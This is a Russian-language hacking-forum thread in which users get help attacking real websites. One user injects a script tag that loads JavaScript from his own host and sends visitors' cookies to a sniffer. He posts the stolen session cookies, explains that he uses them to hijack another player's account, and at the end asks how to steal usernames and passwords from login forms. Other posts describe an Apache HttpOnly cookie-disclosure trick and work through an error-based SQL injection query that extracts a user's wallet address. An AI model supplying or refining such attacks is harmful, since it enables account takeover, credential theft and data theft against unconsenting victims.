Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. nik1201

    nik1201 New Member

    Joined:
    12 Jul 2015
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    Там на форуме на моих куках есть еще 2 строчки которые сниффер не ловит.
    ------------------------------------------------------------------------------------------------------

    w2vL_cca8_auth
    and
    w2vL_cca8_saltkey

    ------------------------------------------------------------------------------------------------------
    Почему эти стрчки не идут,хотя скрипт то стоит на /forum/forum.php а не на www.site.ru?
    И что можно сделать что бы они шли?

     
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    может у них флаг httponly?
     
    _________________________
  3. frank

    frank Member

    Joined:
    8 May 2015
    Messages:
    200
    Likes Received:
    96
    Reputations:
    28
    я так же подумал в начале, но ник1201 пишет о снифере, а если он подразумевает под снифером все-таки снифер, а не скрипт с document.cookie, то там будут видны все куки... хотя, фраза ко мне приходят... я запутался :)
     
  4. nik1201

    nik1201 New Member

    Joined:
    12 Jul 2015
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    На сайте www.site.ru/forum/forum.php у меня вшит скрипт <script src=http:/мойхост.ru/1.js></script> и с сайта www.site.ru/forum/forum.php мне отправляются чужие куки на мой снифер,и в log.txt у меня хранятся чужие куки вида
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    w2vL_cca8_lastvisit=1437004847;
    w2vL_cca8_nofavfid=1;
    PHPSESSID=pe5k27v4h6ar1vsn1rc05lamr3;
    w2vL_cca8_ulastactivity=e5cfycfnuKcJ%2BGIxyWlITZuc7NidwNkrv05%2F53l2Qado4EaUbTuI;
    w2vL_cca8_lastcheckfeed=21728%7C1437560824;
    w2vL_cca8_visitedfid=45D46D53D2;
    w2vL_cca8_viewid=tid_6189;
    w2vL_cca8_forum_lastvisit=D_2_1437336598D_53_1437524926D_46_1437525191D_45_1437561663; ==>Это чужие Cookie
    w2vL_cca8_smile=1D1;
    __zlcmid=Vienkp6pQjrijA;
    _ga=GA1.2.956537111.1436906922F;
    w2vL_cca8_lastact=1437566946%09forum.php%09;
    w2vL_cca8_onlineusernum=59;
    w2vL_cca8_sid=ro6N6g
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    Мне достаточно в куках подменить 2 строчки для того что бы играть за чужого перса (для подмены куков использую расширение для оперы EditThisCookie) на www.site.ru
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    1)PHPSESSID=pe5k27v4h6ar1vsn1rc05lamr3
    2)_ga=GA1.2.956537111.1436906922F
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    А на форуме (www.site.ru/forum/forum.php) у меня не получается подменить куки,даже если я меняю все строчки.
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    Для проверки я зашел на форум под своим логином и при помощи расширения EditThisCookie посмотрел как выглядят свои куки,и там были еще строчки котрые снифер не ловит
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    w2vL_cca8_auth
    w2vL_cca8_saltkey
     
  5. nik1201

    nik1201 New Member

    Joined:
    12 Jul 2015
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    Все я понял,для авторизации на форуме нужны 2 строчки вот эти
    w2vL_cca8_auth
    w2vL_cca8_saltkey
    но почему то снифер их не ловит,в чем может быть проблема?
     
  6. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    посмотрите какие флаги установлены для этих кук
     
    _________________________
  7. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    144
    Likes Received:
    51
    Reputations:
    116
  8. nik1201

    nik1201 New Member

    Joined:
    12 Jul 2015
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    На куках w2vL_cca8_auth установлено "session" и "httpOnly" а на w2vL_cca8_saltkey "httpOnly"
     
  9. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    для JS они недоступны, только для сервера. в этом все и дело. придумывайте другой вектор атаки
     
    _________________________
  10. nik1201

    nik1201 New Member

    Joined:
    12 Jul 2015
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    А обойти можно httponly?
     
  11. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    _________________________
  12. nik1201

    nik1201 New Member

    Joined:
    12 Jul 2015
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    Почему вчера я мог заменить куки а сегодня почему то не получается?
     
  13. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Есть такая узявимость как HTTP Only Cookie Disclosure. Я её ещё называю Cookie Bomb.

    Работает так:

    1) Необходимо установить специальную cookie, название которой располагается ниже cookie, которую необходимо скомпрометировать, при условии упорядочивания их в алфавитном порядке.

    2) Специальная cookie должна состоять из более чем 10000 символов для вызова уязвимости в версии Apache < 2.2.21

    [​IMG]

    (Круче скрина не нашёл в отчётах, соррь. Ну понять можно).

    Соответвественно, работает до версии Apache 2.2.22
     
    _________________________
    randman and frank like this.
  14. frank

    frank Member

    Joined:
    8 May 2015
    Messages:
    200
    Likes Received:
    96
    Reputations:
    28
  15. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    почему бы им не работать?
     
    _________________________
    frank likes this.
  16. frank

    frank Member

    Joined:
    8 May 2015
    Messages:
    200
    Likes Received:
    96
    Reputations:
    28
    Это бы как бы вопрос-уточнение :). Спасибо.
     
  17. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    делаю такой запрос (SELECT 1 and ROW(1,1)>(select count(*),concat((SELECT wallet_address FROM users WHERE user_id = 1),floor(rand(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
    но в ответ получаю
    Subquery returns more than 1 row

    как вытащить wallet_address (34 символа)?

    спасибо
     
  18. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    выводите через extractvalue() или попробуйте обернуть колонку в group_concat()
     
    _________________________
    madam likes this.
  19. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    спасибо group_concat() помогло
     
  20. nik1201

    nik1201 New Member

    Joined:
    12 Jul 2015
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    Есть сайт такого типа[​IMG]
    Форма логина такая - <input type="text" name="username" id="ls_username" class="px vm xg1" value="Email" onfocus="if(this.value == 'Email'){this.value = '';this.className = 'px vm';}" onblur="if(this.value == ''){this.value = 'Email';this.className = 'px vm xg1';}" tabindex="901">
    ----------------------------------------------------------------------------------------------------------------
    Форма пароля такая -<input type="password" name="password" id="ls_password" class="px vm" autocomplete="off" tabindex="902">
    ----------------------------------------------------------------------------------------------------------------
    Можно ли удаленным js воровать логи и пароли из этих форм ?кража кук не подходит т.к httponly не обходится.:(((Или что еще можно придумать?Заранее спс:D
    Картинка была нарисована в paint ,просто порисовать захотелось)))